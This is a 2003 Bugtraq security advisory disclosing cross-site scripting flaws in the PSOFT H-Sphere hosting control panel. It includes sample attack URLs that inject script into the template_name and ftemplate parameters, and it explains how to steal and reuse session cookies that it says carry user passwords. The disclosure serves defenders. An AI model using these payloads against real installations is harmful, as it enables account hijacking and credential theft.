104096 2003-06-09 22:18 /134 rader/ Lorenzo Hernandez Garcia-Hierro <novappc@novappc.com>
Importerad: 2003-06-09 22:18 av Brevbäraren
Extern mottagare: Bugtraq <bugtraq@securityfocus.com>
Externa svar till: novappc@novappc.com
Mottagare: Bugtraq (import) <5185>
Ärende: PSOFT H-Sphere Cross Site Scripting Vulnerabilities
------------------------------------------------------------
--------------------
Product: PSOFT H-Sphere ( Hosting Control Panel )
Vendor: PSOFT ( Positive Software Corporation )
Versions:
VULNERABLE
- 2.3.x
- 2.2.x
- 2.1.x
- 2.0.x
NOT VULNERABLE
- ?
---------------------
Description:
H-Sphere is a scalable multiserver webhosting control panel, which
provides complete hosting automation for Linux, BSD & Win2000
platforms, is easy to use, and has extensive user interface, billing
solution, and integrated trouble tickets system
-----------------------------------------
SECURITY HOLES FOUND and PROOFS OF CONCEPT:
-----------------------------------------
I encountered a lot of XSS ( Cross Site Scripting ) vulnerabilities
in the PSOFT's product called H-Sphere , located in the template
inclusion system. The failure is in the form that the template
system includes a html template page, if the page does not exist the
system prints an error like this:
Unknown template : '[PATH TO NON EXISTENT TEMPLATE PAGE]'
with this you can insert html and script code by url command passing
like this:
http://[TARGET]/[PATH TO PSOFT H-SPHERE
INSTALLATION]/servlet/psoft.hsphere.CP/[VALID AND LOGGED
USER]/[ID]/[PATH OF H-SPHERE USER
SCRIPTS]/servlet/psoft.hsphere.CP?template_name=[HERE COMES YOUR CODE]
The new error page prints this:
Unknown template : '[HERE COMES YOUR CODE]'
And the user web navigator executes all the code and scripts included
in the new error page. This can be used for steal user cookies like
this:
MACTOKEN=[USER]|0000000xxxxxx|0xxxxx0000xxxx0000xxxx0000xxxx00
ESTRUCTURE OF H-SPHERE COOKIE :
MACTOKEN=[USERNAME] | [ USER PASSWORD ] | [ USER SESSION ID ]
You can modify your cookie of h-sphere according the stealed user
cookie and use the system with the user credentials , think in modify
user hosting plans... ;-) .
Please , all the time the user must be logged in valid or the
attacker must use a specially crafted url for include commands in the
client side trought the template system.I think in some public urls...
--------------
SAMPLES
--------------
http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP?action=login&ftemplate=[MORE CODE
AND
XSS]&requestURL="><h1>XSS%20in%20PSOFT%20SPHERE<a%20href="&login=[USERNAME]&
password=[PASSWORD]
http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<H1>xss</H1>
http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<IFRAME>
http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<h1>XSS
http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<script>alert(document.cookie);</script>
All urls that use the template and ftemplate / template_name url
input are affected by this type of XSS attack .
-------------------------
| CONCLUSIONS AND NOTES |
-------------------------
All the urls that use this template incluion input are affected by
this hole. User data and cookies can be stoolen by this without
permission. In some conditions we can pass server-based commands.
The server can pick up sending specially crafted urls and input
values . We can enter other-user domain configurations passing an
specific domain id value.
- I test this in the official psoft demo and run but recently they
change the demo and don't allow me to enter the system. The system
says a Generic Error . ;-).
-----------
| CONTACT |
-----------
Lorenzo Manuel Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--Nova Projects Professional Coding--
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
www.novappc.com
security.novappc.com
www.lorenzohgh.com
______________________
(104096) /Lorenzo Hernandez Garcia-Hierro <novappc@novappc.com>/(Ombruten)